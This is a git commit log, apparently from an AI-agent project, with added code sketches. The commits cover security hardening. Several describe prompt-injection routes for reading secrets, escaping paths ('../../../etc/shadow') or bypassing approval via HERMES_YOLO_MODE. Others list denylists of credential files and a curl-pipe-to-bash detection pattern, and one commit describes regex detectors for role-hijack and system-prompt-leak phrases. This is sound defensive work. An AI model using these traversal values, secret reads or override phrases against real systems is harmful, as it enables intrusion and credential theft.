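The case-insensitive skip parsing described above could be as small as the following sketch. The token set is copied from the commit message; the function name `is_skip_input` is an assumption.

```python
# The seven tokens named in the commit message.
SKIP_TOKENS = frozenset({"skip", "cancel", "s", "n", "no", "q", "quit"})


def is_skip_input(line):
    """True when the pasted line is one of the skip tokens, ignoring case and padding."""
    return line.strip().lower() in SKIP_TOKENS
```

Checking for a skip token before attempting to parse the input as a URL keeps a stray 'q' from being reported as a malformed callback.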
Teknium	a989a79c0c	fix(gateway): allow native delivery of freshly-produced agent files (#32060 ) The gateway's media delivery allowlist required files live inside `~/.hermes/cache/{documents,images,...}`, which is the wrong shape for real agent usage. Agents naturally produce artifacts via terminal tools (`pandoc -o /tmp/report.pdf`, `matplotlib savefig`, etc.) or write_file into project directories — these never land under the cache. Result: users got a raw file path in chat instead of an attachment. This is doubly bad in deployment shapes where the cache directories aren't writable by the agent at all: Hermes running in Docker with a read-only mount, or with a Docker/Modal/SSH terminal backend whose filesystem isn't the gateway host's filesystem. Layered trust model: 1. Cache-dir allowlist (unchanged) — Hermes-managed roots always trusted. 2. Operator allowlist — `HERMES_MEDIA_ALLOW_DIRS` env var, now also surfaced as `gateway.media_delivery_allow_dirs` in config.yaml. 3. Recency-based trust (new, default on) — files whose mtime is within `gateway.trust_recent_files_seconds` (default 600s) of "now" are trusted even outside the cache/operator allowlist. Old host files (`/etc/passwd`, `~/.bashrc`, `~/.ssh/id_rsa`) have mtimes measured in days/months, well outside the window — prompt-injection paths pointing at pre-existing files are still rejected. 4. Hard denylist — `/etc`, `/proc`, `/sys`, `/dev`, `/root`, `/boot`, `/var/{log,lib,run}`, plus `$HOME/.{ssh,aws,gnupg,kube,docker,config, azure,gcloud}` and `Library/Keychains`. Denylist blocks delivery even when recency would trust the file, in case an attacker somehow refreshes a sensitive file's mtime. Operators who want strict-allowlist behavior set `gateway.trust_recent_files: false` and the system reverts to pre-existing behavior. Tests: 6 new cases in test_platform_base.py cover the recency window, disabled mode, system-path denylist, and the motivating PDF-in-project scenario. 
3 existing tests (test_platform_base, test_tts_media_routing, test_send_message_tool) that exercised the strict-allowlist path are updated to disable recency trust explicitly. E2E validation: real `validate_media_delivery_path()` accepts fresh PDFs in /tmp and project dirs, rejects /etc/passwd, ~/.ssh/id_rsa, and files older than the window; config.yaml `gateway.*` keys bridge correctly to the env vars the validator reads.	2026-05-25 05:34:31 -07:00
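The layered trust model in the commit above can be approximated by the sketch below. It is not the real `validate_media_delivery_path()`: the function name `is_deliverable`, its parameters, and the decision to check the denylist before the allowlist are assumptions, and the `$HOME` dot-directories and `Library/Keychains` entries are left out for brevity.

```python
import time
from pathlib import Path

# System prefixes from the commit's hard denylist (home-directory entries omitted).
DENY_PREFIXES = ("/etc", "/proc", "/sys", "/dev", "/root", "/boot",
                 "/var/log", "/var/lib", "/var/run")


def _is_under(path, root):
    """True if path equals root or lives somewhere below it."""
    try:
        path.relative_to(root)
        return True
    except ValueError:
        return False


def is_deliverable(path, allow_roots, trust_recent_seconds=600, now=None):
    """Denylist, then cache/operator allowlist, then mtime recency window."""
    resolved = Path(path).resolve()
    if any(_is_under(resolved, Path(p).resolve()) for p in DENY_PREFIXES):
        return False
    if any(_is_under(resolved, Path(r).resolve()) for r in allow_roots):
        return True
    if trust_recent_seconds <= 0:
        return False  # recency trust disabled: strict allowlist behavior
    try:
        mtime = resolved.stat().st_mtime
    except OSError:
        return False
    current = time.time() if now is None else now
    return (current - mtime) <= trust_recent_seconds
```

Resolving both the candidate and the roots means a symlink inside an allowed directory that points at a denied location is still rejected.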
Teknium	0ff7c09e2f	feat(mcp-oauth): stdin paste-back fallback for headless OAuth flow (#32053 ) When the user runs OAuth on a remote/SSH machine without a port forward, the OAuth provider redirects to http://127.0.0.1:<port>/callback which only the listener on the remote machine can receive — the user's browser on another box just shows a connection error. _wait_for_callback() now races the HTTP listener against a stdin reader on interactive TTYs. The user can copy the URL from the browser's address bar after authorization (which contains code=...&state=...) and paste it back at the prompt. Whichever fills the result dict first wins; the HTTP listener remains the primary path for local sessions and SSH tunnels. Accepts any of: - Full local redirect URL: http://127.0.0.1:N/callback?code=...&state=... - Provider URL after redirect: https://mcp.linear.app/callback?code=...&state=... - Just the query string: ?code=...&state=... or code=...&state=... The paste thread only spawns when _is_interactive() is true, preserving the existing 'no input() in headless runs' invariant — verified by TestWaitForCallbackPasteIntegration.test_paste_prompt_NOT_shown_when_noninteractive. The SSH-session hint in _redirect_handler is updated to surface the paste option as the primary remedy, with ssh -L tunneling as the alternative.	2026-05-25 05:20:05 -07:00
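The three accepted paste shapes listed above (full local redirect URL, provider URL, bare query string) can all be reduced to one query-string parse. The helper below is a sketch using only `urllib.parse`; the name `parse_pasted_callback` and its return shape are assumptions rather than the project's API.

```python
from urllib.parse import parse_qs, urlsplit


def parse_pasted_callback(text):
    """Return (code, state) from a pasted URL or query string, or None if no code."""
    text = text.strip()
    if "://" in text:
        query = urlsplit(text).query
    else:
        query = text.lstrip("?")
    params = parse_qs(query)
    code = params.get("code", [None])[0]
    state = params.get("state", [None])[0]
    if not code:
        return None
    return code, state
```

Returning `None` for unparseable input lets the caller re-prompt instead of filling the shared result dict with a bogus value.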
aaronlab	5f20322d23	fix(tts): reject '..' traversal in output_path text_to_speech_tool accepts an explicit output_path. Without a traversal guard, a path containing '..' components (whether prompt-injection- controlled, from a confused skill, or just a buggy caller) could escape its declared base and write the audio to a system location — e.g. `output_path='audio/../../etc/cron.d/x'` lands the file outside the intended audio cache. Reject '..' components in the user-supplied path. Explicit absolute paths are unchanged (the agent legitimately writes audio wherever the user/caller asks); only traversal-style escapes are blocked. The terminal tool can still write anywhere with approval — this just keeps the unattended TTS surface from materializing files via traversal. Regression tests cover: '..' in the middle (audio/../../etc/...), bare '..' prefix, and the negative cases (absolute paths + relative paths without '..' both pass through unchanged). Salvaged from PR #6693 by @aaronlab. The original PR confined output to DEFAULT_OUTPUT_DIR-or-cwd, which broke 9 existing tests that legitimately write to tmp_path locations. The traversal-only check covers the actual threat (path-escape via '..' from prompt injection) without restricting where users can choose to write their audio. The remaining pieces of #6693 (skill_commands rglob symlink rejection, delegate_tool batch prefix display) are dropped: - skill_commands rglob: breaks the documented design supporting ~/.hermes/skills/<name> as a symlink to a checked-out skill elsewhere (see comment at agent/skill_commands.py:73-75) - delegate_tool batch prefix: pure UX, doesn't belong in a security PR Co-authored-by: teknium1 <127238744+teknium1@users.noreply.github.com>	2026-05-25 05:15:55 -07:00
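A traversal-only check of the kind described above (reject '..' components, leave absolute and plain relative paths alone) might look like this sketch. The function name is hypothetical and the repository's actual guard may differ in detail.

```python
import re


def has_traversal_component(path):
    """True if any path component, split on / or \\, is exactly '..'."""
    return ".." in re.split(r"[\\/]+", path)
```

Comparing whole components rather than searching for the substring '..' keeps file names such as `my..take.mp3` valid.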
Teknium	79799c80f5	test(approval): patch _YOLO_MODE_FROZEN directly in test_yolo_overrides_cron_deny The test set HERMES_YOLO_MODE=1 via monkeypatch.setenv, expecting check_dangerous_command() to honor yolo and bypass cron_mode=deny. But tools.approval._YOLO_MODE_FROZEN is intentionally frozen at module import time (security: prevents prompt-injection runtime escalation). When CI imports the module BEFORE the test sets the env, the frozen value stays False and the yolo bypass never activates. Local runs missed this because the conftest leaked a non-empty HERMES_YOLO_MODE into the import-time env. CI's clean-env path exposed the bug deterministically on test (3) / test (4) shards. Fix: patch the module attribute directly via mock.patch.object so the test simulates process-startup-with-yolo regardless of import order. The behavior under test (yolo bypasses cron_mode=deny for non-hardline commands) is unchanged; the security invariant (_YOLO_MODE_FROZEN can't be set at runtime by skills) is preserved. Reproduced locally with: env -i HOME=$HOME PATH=$PATH python3 -m pytest tests/tools/test_cron_approval_mode.py -o 'addopts=' -v Without the fix: 1 failed, 23 passed. With the fix: 24 passed.	2026-05-25 05:07:49 -07:00
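The import-order problem described above can be reproduced in miniature. In the sketch below, `load_approval_module` is a hypothetical stand-in that simulates importing a module which reads `HERMES_YOLO_MODE` once and freezes the result; the set of truthy strings is an assumption, not the behavior of the project's `is_truthy_value()`.

```python
from types import SimpleNamespace
from unittest import mock


def load_approval_module(environ):
    """Simulate module import: read the env var once and freeze the result."""
    raw = environ.get("HERMES_YOLO_MODE", "").strip().lower()
    return SimpleNamespace(_YOLO_MODE_FROZEN=raw in {"1", "true", "yes", "on"})


def yolo_active(module):
    """Later checks consult only the frozen flag, never the live environment."""
    return module._YOLO_MODE_FROZEN


env = {}
approval = load_approval_module(env)   # "import" happens with a clean env
env["HERMES_YOLO_MODE"] = "1"          # setting the variable afterwards has no effect
assert yolo_active(approval) is False

# A test that needs yolo mode patches the frozen attribute directly.
with mock.patch.object(approval, "_YOLO_MODE_FROZEN", True):
    assert yolo_active(approval) is True
```

Patching the attribute simulates a process that started with yolo enabled, independent of when the module was first imported.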
Peter	95848b1cbc	fix(transcription): reject symlinked audio inputs (#10082 ) * fix(transcription): reject symlinked audio inputs Validation runs before provider selection, so rejecting symbolic-link paths there prevents supported-extension links from being treated as normal audio files. Use os.path.islink to avoid perturbing the existing Path.stat error path and to reject links before resolving targets. Constraint: Keep validation platform-safe and avoid requiring symlink support where unavailable. Rejected: Use Path.is_symlink \| it consumes pathlib stat calls and broke the existing stat error regression. Confidence: high Scope-risk: narrow Directive: Keep path hardening in _validate_audio_file before provider dispatch. Tested: source venv/bin/activate && python -m pytest tests/tools/test_transcription_tools.py::TestValidateAudioFileEdgeCases -q (5 passed) Tested: source venv/bin/activate && python -m pytest tests/tools/test_transcription_tools.py::TestValidateAudioFileEdgeCases tests/tools/test_transcription_tools.py::TestTranscribeAudioDispatch::test_invalid_file_short_circuits -q (6 passed) Tested: source venv/bin/activate && python -m compileall tools/transcription_tools.py tests/tools/test_transcription_tools.py Tested: git diff --check Not-tested: Full tests/tools/test_transcription_tools.py under .[dev] only; existing faster_whisper optional dependency tests fail with ModuleNotFoundError. * Keep transcription tests independent of optional whisper install The transcription suite mocks faster-whisper directly, so a minimal test stub keeps the branch verifiable in environments where the optional package is not installed. This preserves the existing mock-based coverage without adding a dependency. 
Constraint: faster-whisper is an optional local STT dependency and is absent from the current validation environment Rejected: Install faster-whisper just for branch validation \| would add heavyweight environment coupling outside the patch scope Confidence: high Scope-risk: narrow Directive: Keep this as a test-only stub unless production import semantics change Tested: pytest tests/tools/test_transcription_tools.py -q --------- Co-authored-by: WuKongAI-CMU <210765158+WuKongAI-CMU@users.noreply.github.com>	2026-05-25 05:07:45 -07:00
Peter	ee59ef1946	fix: reject read_file symlinks to blocking devices (#10133 ) * fix: reject read_file symlinks to blocking devices The read_file guard already refused direct device paths such as /dev/zero, but a workspace symlink resolving to one of those devices could still reach the shell-backed read path and hang on wc/head/sed. Keep the literal alias check and add a resolved-path pass so local symlinks to blocked device/fd endpoints are rejected before I/O. Constraint: Preserve literal /dev/stdin handling before terminal-specific realpath resolution Confidence: high Scope-risk: narrow Tested: pytest tests/tools/test_file_read_guards.py tests/tools/test_file_tools.py -q; python -m compileall tools/file_tools.py tests/tools/test_file_read_guards.py; git diff --check Signed-off-by: WuKongAI-CMU <210765158+WuKongAI-CMU@users.noreply.github.com> * Keep file guard tests off sensitive macOS temp paths The branch now inherits a sensitive-path write guard from upstream main. On macOS, tempfile.mkdtemp() resolves under /private/var/folders, so the new write-path guard fired before the file read dedup assertions could exercise their intended behavior. The tests now create their scratch files inside the worktree temp checkout, outside those system-sensitive prefixes, without changing production behavior. Constraint: Rebased branch must pass the expanded file read guard suite on macOS. Rejected: Loosen the production sensitive-path prefix list \| broader behavior change unrelated to this PR. Confidence: high Scope-risk: narrow Tested: pytest tests/tools/test_file_read_guards.py -q --------- Signed-off-by: WuKongAI-CMU <210765158+WuKongAI-CMU@users.noreply.github.com> Co-authored-by: WuKongAI-CMU <210765158+WuKongAI-CMU@users.noreply.github.com>	2026-05-25 05:07:38 -07:00
Dakota Secula-Rosell	b7b8bec800	fix(security): block /proc/*/environ, cmdline, maps from file read (#4609) The read_file tool and terminal cat can access /proc/self/environ to recover all process env vars including secrets stripped by the subprocess blocklist. Output redaction partially mitigates (catches known-format tokens) but misses custom/proprietary key formats, especially when values are printed without their key names. Add /proc/*/environ, /proc/*/cmdline, and /proc/*/maps to the blocked device paths in _is_blocked_device(): - /proc/*/environ: leaks full process env (API keys, tokens) - /proc/*/cmdline: leaks command-line args (may contain passwords) - /proc/*/maps: leaks memory layout (ASLR bypass for exploitation) Legitimate /proc reads (cpuinfo, meminfo, uptime, version) remain accessible — the check only blocks per-pid pseudo-files with known sensitive suffixes. Complements PR #4432 (PID namespace isolation for child processes) which prevents children from reading the parent's /proc, but does not prevent the parent process itself from being read via file tools. Partially addresses #4427 Changes: tools/file_tools.py \| +6 tests/tools/test_file_read_guards.py \| +18 -1 Co-authored-by: dsr-restyn <dsr-restyn@users.noreply.github.com>	2026-05-25 05:07:31 -07:00
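The per-pid suffix check described above could be written as a single anchored pattern. This is a sketch under the assumption that only the three named pseudo-files are blocked; `is_blocked_proc_path` is an illustrative name, not the body of `_is_blocked_device()`.

```python
import re

# One path segment after /proc (a pid, 'self', etc.), then a sensitive suffix.
_PROC_SENSITIVE = re.compile(r"^/proc/[^/]+/(?:environ|cmdline|maps)$")


def is_blocked_proc_path(path):
    """True for per-process pseudo-files that leak env, argv, or memory layout."""
    return bool(_PROC_SENSITIVE.match(path))
```

Because the pattern requires a segment between `/proc/` and the suffix, top-level files such as `/proc/cpuinfo` stay readable.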
Rodrigo	4cb3eb03c7	fix(approval): harden YOLO bypass, LLM parsing, auto-approve audit, pipe pattern (#23835 ) * fix(approval): harden YOLO bypass, LLM parsing, auto-approve audit, pipe pattern - BUG-009 (CRITICAL): freeze HERMES_YOLO_MODE at module import via _YOLO_MODE_FROZEN; prevents skills/prompt-injection from calling os.environ["HERMES_YOLO_MODE"]="true" at runtime to bypass all checks - BUG-002 (HIGH): replace substring "APPROVE" in answer with exact answer == "APPROVE" in _smart_approve; prompt already requests exactly one word, substring match was exploitable via verbose LLM responses - BUG-001 (MEDIUM): add logger.warning for every dangerous command that auto-approves in non-interactive non-gateway context; makes silent approvals visible in audit logs without breaking script behavior - BUG-008 (LOW): expand curl/wget pipe pattern to cover \| /bin/bash and \| bash -c variants, not just \| sh / \| bash Co-Authored-By: Claude Sonnet 4.6 <noreply@anthropic.com> * fix(approval): add missing is_truthy_value import + fix yolo test patches _YOLO_MODE_FROZEN uses is_truthy_value() from utils — import was missing. Tests that set HERMES_YOLO_MODE via monkeypatch.setenv() no longer work because the value is frozen at import time; update them to patch the module-level flag directly via monkeypatch.setattr(). Co-Authored-By: Claude Sonnet 4.6 <noreply@anthropic.com> --------- Co-authored-by: Claude Sonnet 4.6 <noreply@anthropic.com>	2026-05-25 03:35:33 -07:00
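Two of the fixes above are easy to illustrate: the move from substring to exact matching on the approver's one-word answer (BUG-002), and the wider curl/wget pipe-to-shell pattern (BUG-008). The regex below is an assumed approximation written for this example, not the pattern shipped in the repository, and whether the real code normalizes the answer before comparing is not stated in the commit.

```python
import re


def substring_approve(answer):
    """Old behavior: any response containing the word counts as approval."""
    return "APPROVE" in answer


def exact_approve(answer):
    """New behavior: only the single expected word counts."""
    return answer == "APPROVE"


# Hypothetical pattern: curl or wget piped into sh or bash, with an optional path prefix.
PIPE_TO_SHELL = re.compile(r"\b(?:curl|wget)\b[^|]*\|\s*(?:\S*/)?(?:ba)?sh\b")


def pipes_download_to_shell(command):
    return bool(PIPE_TO_SHELL.search(command))
```

A verbose answer such as "I would not APPROVE this command" passes the substring check but fails the exact one, which is the exploit path the commit closes.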
waefrebeorn	5faea3f618	fix(file_tools): reject '..' traversal in V4A patch headers V4A patch '* Update File:', '* Add File:', '* Delete File:' headers come from patch CONTENT, not the explicit `path=` argument. That makes them attacker-influenceable through skill content, web extract output, prompt injection, and other surfaces the agent processes. Headers like '* Update File: ../../../etc/shadow' would resolve relative to the agent's cwd; in deployment configurations where that cwd is deep enough to land outside Hermes' protected paths, the write could land somewhere the agent operator did not intend. Reject any V4A header containing a '..' path component before applying the patch. The explicit `path=` argument on patch_tool is UNCHANGED — the agent legitimately uses '..' there (e.g. `patch path='../other_module/x.py'` from a worktree dir is normal cross-module editing). Regression tests: V4A Update header with traversal rejected, V4A Add header with traversal rejected, patch_v4a never invoked when rejection fires. Salvaged from PR #29395 by @waefrebeorn. The original PR added has_traversal_component as a blanket reject on read_file_tool, write_file_tool, patch_tool's explicit path, and search_tool — that would break legitimate agent operation where '..' is normal. Also dropped the over-eager skills_guard pattern additions (pickle.loads/marshal.loads/ctypes.CDLL/importlib at high/critical severity would false-positive on legit data-science and FFI skills). Co-authored-by: teknium1 <127238744+teknium1@users.noreply.github.com>	2026-05-25 01:55:59 -07:00
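A sketch of the header check described above follows. It scans patch content for Update/Add/Delete File headers and reports any target containing a '..' component. The header regex accepts one or more leading asterisks, which is an assumption about the V4A format as rendered in this log, and `traversal_headers` is a hypothetical helper name.

```python
import re

# Assumed header shape: leading asterisks, an action, then the target path.
_HEADER = re.compile(
    r"^\*+\s*(?:Update|Add|Delete) File:\s*(.+?)\s*$", re.MULTILINE
)


def traversal_headers(patch_text):
    """Return header targets that contain a '..' path component."""
    bad = []
    for match in _HEADER.finditer(patch_text):
        target = match.group(1)
        if ".." in re.split(r"[\\/]+", target):
            bad.append(target)
    return bad
```

A caller would refuse to apply the patch whenever the returned list is non-empty, while leaving the explicit `path=` argument unchecked, as the commit describes.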
AdamPlatin123	00bd24e27c	fix(security): expand memory content scanning patterns to parity with skills guard (#9151 ) Expand _MEMORY_THREAT_PATTERNS from 13 to 24 regex patterns and align _INVISIBLE_CHARS with skills_guard.py (10 → 17 characters). Key changes: - Add multi-word bypass prevention (?:\w+\s+)* to injection patterns - Add missing injection patterns: role_pretend, leak_system_prompt, remove_filters, fake_update, translate_execute, html_comment_injection, hidden_div - Add exfiltration patterns: send_to_url, context_exfil - Add persistence patterns: agent_config_mod, hermes_config_mod (both require modification-verb prefix to avoid false positives on mere mentions of config filenames) - Add hardcoded secret detection pattern - Add role_hijack precision fix: require article after "now" to avoid blocking "you are now ready/connected/set up" etc. - Expand invisible unicode set with directional isolates (U+2066-2069) and invisible math operators (U+2062-2064) Test coverage expanded from ~8 to ~30 scan tests including dedicated false-positive regression tests for all precision-sensitive patterns. Known limitations (deferred to follow-up PRs): - prompt_builder.py and cronjob_tools.py still use older pattern sets - No semantic/LLM-based scanning (regex-only approach) - No cross-entry or cross-store analysis	2026-05-25 01:51:53 -07:00
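Three of the ideas in the commit above lend themselves to a short illustration: the `(?:\w+\s+)*` filler that defeats multi-word bypasses, the article requirement that keeps "you are now ready" from matching, and the expanded invisible-character ranges. The two regexes below are written for this example only and are not the repository's `_MEMORY_THREAT_PATTERNS`.

```python
import re

PATTERNS = {
    # Requires an article after "now", so "you are now ready" does not match.
    "role_hijack": re.compile(r"\byou\s+are\s+now\s+(?:a|an|the)\s+\w+", re.IGNORECASE),
    # (?:\w+\s+)* tolerates filler words between the verb and its object.
    "ignore_previous": re.compile(
        r"\bignore\s+(?:\w+\s+)*previous\s+instructions\b", re.IGNORECASE
    ),
}

# Invisible math operators (U+2062-2064) and directional isolates (U+2066-2069).
INVISIBLE_CHARS = {chr(c) for c in range(0x2062, 0x2065)} | {
    chr(c) for c in range(0x2066, 0x206A)
}


def scan_memory_entry(text):
    """Return the names of every check that fires on the given text."""
    hits = [name for name, pattern in PATTERNS.items() if pattern.search(text)]
    if any(ch in INVISIBLE_CHARS for ch in text):
        hits.append("invisible_unicode")
    return hits
```

The false-positive cases matter as much as the hits, which is why the commit pairs each precision-sensitive pattern with a dedicated regression test.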
Edward-x	7ebebfbb8d	Harden Skills Guard multi-word prompt patterns (#26852) Co-authored-by: openhands <openhands@all-hands.dev>	2026-05-25 01:51:27 -07:00
Jorge Fuenmayor	93660643a6	fix: harden skill trust source matching (#31229) Co-authored-by: gaia <gaia@gaia.local>	2026-05-25 01:51:15 -07:00
teknium1	d3ffbc6409	feat(stt): add stt.providers.<name> command-provider registry Mirror of the TTS command-provider registry (PR #17843) for STT. Lets any shell-driven ASR engine — Doubao ASR, NVIDIA Parakeet, whisper.cpp builds, SenseVoice, curl pipelines — become an STT backend with zero Python. Complements the legacy HERMES_LOCAL_STT_COMMAND escape hatch (preserved untouched via the built-in local_command path) and the register_transcription_provider() Python plugin hook also shipped in this PR. Resolution order (mirrors TTS exactly): 1. Built-in (local, local_command, groq, openai, mistral, xai) → native handler. Always wins. 2. stt.providers.<name>: type: command → command-provider runner. 3. Plugin-registered TranscriptionProvider → plugin dispatch. 4. No match → 'No STT provider available'. Files ----- - tools/transcription_tools.py: BUILTIN_STT_PROVIDERS frozenset retained; added _resolve_command_stt_provider_config, _transcribe_command_stt, and local helpers for template rendering, shell-quote context, and process-tree termination. Helpers are documented as mirrors of their tts_tool.py counterparts (kept local to avoid cross-tool private import). Wire-in is one insertion point in transcribe_audio() after the xai elif and before the plugin dispatcher. Plugin dispatcher additionally defensively short-circuits when a same-name command config exists (command-wins-over-plugin invariant). 
- tests/tools/test_transcription_command_providers.py: 50 new tests covering resolution (builtin precedence, type/command gating, case-insensitive lookup, legacy stt.<name> back-compat), helpers (timeout fallback, format validation, iter, has-any), template rendering (shell-quote contexts, doubled-brace preservation), end-to-end via _transcribe_command_stt (output_path read, stdout fallback, timeout, nonzero exit envelope, model override, language precedence), and dispatcher integration via the real transcribe_audio() including command-wins-over-plugin and builtin-shadow-rejection. - tests/plugins/transcription/check_parity_vs_main.py: extended from 10 to 13 scenarios. New cases: command-provider-installed, command-vs-plugin-same-name (verifies command wins precedence), explicit-openai-with-command-shadow (verifies built-in wins). Adds command_provider dispatch_kind detection via transcript prefix (CMD: vs PLUGIN:) so command-provider scenarios can be distinguished from plugin scenarios even when sharing a provider name. - website/docs/user-guide/features/tts.md: new 'STT custom command providers' section symmetric to the TTS section — example config, placeholder grammar table (input_path / output_path / output_dir / format / language / model), transcript-read-back semantics (file first, then stdout fallback), optional keys table, behavior notes, security note. Updated 'Python plugin providers (STT)' to include the new 'When to pick which (STT)' decision table and updated resolution-order section (now 4 layers instead of 3). Verification ------------ 189/189 STT targeted tests + 50/50 new command-provider tests pass. Combined sweep: tests/tools/ 5576/5576, tests/agent/ + tests/hermes_cli/ 8623/8623 — zero regressions across 14,199 tests. Parity harness: 13 scenarios, 9 OK + 4 expected diffs (no_provider_error → plugin, plugin_unavailable, command_provider × 2). 
E2E live-verified in an isolated HERMES_HOME with a real .wav file: command: → dispatched to stt.providers.my-fake-cli plugin: → dispatched to registered TranscriptionProvider command-wins-over-plugin: → command provider beats same-name plugin builtin-wins-over-command: → built-in OpenAI handler fires; stt.providers.openai: type: command does NOT hijack it.	2026-05-25 01:41:19 -07:00
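The four-step resolution order in the commit above (built-in, then command provider, then plugin, then no match) can be sketched as a pure function. The built-in names come from the commit message; `resolve_stt_backend`, its parameters, and the returned labels are assumptions, and the legacy `stt.<name>` back-compat lookup is not modeled.

```python
BUILTIN_STT_PROVIDERS = frozenset(
    {"local", "local_command", "groq", "openai", "mistral", "xai"}
)


def resolve_stt_backend(name, stt_config, plugin_names):
    """Return 'builtin', 'command', 'plugin', or 'none' for a provider name."""
    key = name.strip().lower()
    if key in BUILTIN_STT_PROVIDERS:
        return "builtin"  # built-ins always win
    providers = stt_config.get("providers") or {}
    # Case-insensitive lookup of stt.providers.<name>.
    entry = next((v for k, v in providers.items() if k.lower() == key), None)
    if isinstance(entry, dict) and entry.get("type") == "command" and entry.get("command"):
        return "command"  # command provider beats a same-name plugin
    if key in plugin_names:
        return "plugin"
    return "none"
```

Keeping the decision separate from the dispatch makes the precedence rules testable without spawning a process or loading a plugin.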
kshitijk4poor	2cd952e110	feat(stt): add register_transcription_provider() plugin hook Add an opt-in Python plugin surface for speech-to-text backends, mirroring the TTS hook pattern. New backends (OpenRouter, SenseAudio, Gemini-STT, custom proprietary engines) can be implemented as plugins without modifying tools/transcription_tools.py. Built-ins always win -------------------- The 6 built-in STT providers (local/faster-whisper, local_command, groq, openai, mistral, xai) keep their native handlers. Plugins attempting to register under a built-in name are rejected at registration time with a warning and re-checked defensively at dispatch. Resolution order ---------------- 1. stt.provider matches a built-in → built-in dispatch (unchanged) 2. stt.provider matches a registered plugin → a. if plugin.is_available() returns False → unavailability envelope identifying the plugin (not the generic "No STT provider" message — the user explicitly opted into this plugin) b. otherwise plugin.transcribe() with model + language forwarded from stt.<provider>.{model,language} config 3. No match → legacy "No STT provider available" error (unchanged) Per-provider config namespace ----------------------------- Plugins read their config from stt.<provider> in config.yaml, mirroring how built-ins read stt.openai.model / stt.mistral.model. The dispatcher forwards `model` and `language` from this section. Caller's explicit `model=` argument overrides the config-set model. 
Files ----- - agent/transcription_provider.py: TranscriptionProvider ABC - agent/transcription_registry.py: register/get/list providers, built-in shadow guard, _reset_for_tests - hermes_cli/plugins.py: register_transcription_provider() on PluginContext - tools/transcription_tools.py: BUILTIN_STT_PROVIDERS frozenset, _dispatch_to_plugin_provider() with availability gate, wire-in after xai branch and before "No STT provider" error - tests/agent/test_transcription_registry.py: 27 tests - tests/hermes_cli/test_plugins_transcription_registration.py: 3 tests - tests/tools/test_transcription_plugin_dispatch.py: 28 tests (covering built-in short-circuit, plugin dispatch, exception envelope, non-dict guard, availability gate, language forwarding) - tests/plugins/transcription/check_parity_vs_main.py: 10-scenario subprocess-pinned parity harness vs origin/main - website/docs/user-guide/features/{tts,plugins}.md: docs Behavior parity --------------- 10 scenarios, 8 OK + 2 expected DIFFs: no_provider_error → plugin (plugin-installed scenario) no_provider_error → plugin_unavailable (plugin-installed-unavailable scenario; PR returns cleaner envelope) Zero behavior change for users not opting into a plugin. Issue follow-up to #30398.	2026-05-25 01:41:19 -07:00
Ben Barclay	7e165e843d	Merge pull request #31760 from NousResearch/hermes/hermes-bf5898da feat(docker)!: s6-overlay container supervision (salvage of #30136)	2026-05-25 12:57:51 +10:00
Ben	7d54288d82	test(dockerfile): recognize s6-overlay/init as a valid PID-1; harden against historical-comment masquerade PR #30136 CI: test_dockerfile_entrypoint_routes_through_the_init failed because the test hardcoded known_inits = ('tini', 'dumb-init', 'catatonit'). The PR replaced tini with s6-overlay's /init (which execs s6-svscan as PID 1) — same SIGCHLD-reaping contract, different name, so the substring scan against ENTRYPOINT missed it. Two-part fix: 1. Extend the accepted token list to include 's6-overlay', 's6-svscan', and '/init'. The contract these tests enforce is behavioural ('some PID-1 init reaps SIGCHLD'), so the names list is purely a recognition table and any reaper-capable family should qualify. 2. Harden test_dockerfile_installs_an_init_for_zombie_reaping (the sibling check) against comment-only matches. It was scanning the full Dockerfile text and only passed because the word 'tini' is still in a historical comment explaining why we used to use it. The next person to clean up that comment would have silently broken the test. New _instruction_text() helper joins only the parsed, non-comment Dockerfile instructions so stale comments can't satisfy the check. (cherry picked from commit `ffc1bb6393`)	2026-05-25 12:24:58 +10:00
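The comment-masquerade problem described above comes from scanning the whole Dockerfile text. A minimal sketch of the alternative is shown below; it drops comment and blank lines before looking for an init token. The helper names are illustrative, the token list is taken from the commit message, and the line-based filter is a simplification that ignores heredocs.

```python
KNOWN_INITS = ("tini", "dumb-init", "catatonit", "s6-overlay", "s6-svscan", "/init")


def instruction_text(dockerfile):
    """Join only non-comment, non-blank lines of a Dockerfile."""
    kept = []
    for line in dockerfile.splitlines():
        stripped = line.strip()
        if not stripped or stripped.startswith("#"):
            continue
        kept.append(stripped)
    return "\n".join(kept)


def mentions_known_init(dockerfile):
    """True if any instruction line (not a comment) names a known init."""
    text = instruction_text(dockerfile)
    return any(token in text for token in KNOWN_INITS)
```

With this filter, a historical comment that mentions tini no longer satisfies the check on its own.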
teknium1	7f6f00f6ec	test(dockerfile): accept s6-overlay /init as a known PID-1 init Follow-up to @benbarclay's #30136 salvage. The pre-existing PID-1 contract tests in tests/tools/test_dockerfile_pid1_reaping.py (added with #15012) hardcoded tini/dumb-init/catatonit as the only accepted inits, so they failed after #30136 replaced tini with s6-overlay's /init. s6-overlay's PID 1 is s6-svscan, which reaps zombies non-blockingly on SIGCHLD — same contract the test exists to enforce. Two updates: * test_dockerfile_installs_an_init_for_zombie_reaping — accept 's6-overlay' as a known-installed marker (matches the s6-overlay install layer in Ben's Dockerfile). * test_dockerfile_entrypoint_routes_through_the_init — accept '/init' as a known-routed marker (s6-overlay's PID-1 binary lives at /init by convention). Both assertions still fire if a future Dockerfile rewrite drops the init entirely. Local: 7/7 pass.	2026-05-24 18:32:14 -07:00
kshitijk4poor	af973e4071	refactor(gateway): migrate Mattermost adapter to bundled plugin Second migration of an existing built-in platform adapter after Discord (PR #30591) — follows the same shape established by IRC / Teams / LINE / Google Chat / SimpleX and the playbook in `references/platform-plugin-migration.md`. Advances the umbrella refactor in #3823. Matches Discord's parity bar — adapter under `plugins/platforms/mattermost/` with the standard `__init__.py` / `adapter.py` / `plugin.yaml` shell, `register(ctx)` entry point, no back-compat shim at the old import path, and full parity for all five hooks Discord uses plus the `apply_yaml_config_fn` hook (mattermost is the second consumer of #25443 after Discord): * `standalone_sender_fn` — out-of-process cron delivery via Mattermost REST API. Picks up the thread_id + media_files capabilities the legacy `_send_mattermost` lacked (parity with Discord's `_standalone_send`). * `setup_fn` — interactive `hermes setup gateway` wizard. * `apply_yaml_config_fn` — translates `config.yaml` `mattermost:` keys (`require_mention`, `free_response_channels`, `allowed_channels`) into `MATTERMOST_*` env vars (replaces the hardcoded block in `gateway/config.py`). * `is_connected` — declares connection state from `MATTERMOST_TOKEN` + `MATTERMOST_URL`. * `check_fn` — verifies aiohttp is installed and both required env vars are set. * plus `allowed_users_env`, `allow_all_env`, `cron_deliver_env_var`, `max_message_length` (4000 — Mattermost practical limit), `emoji`, `required_env`, `install_hint`. Files ----- * `gateway/platforms/mattermost.py` (873 LOC) → 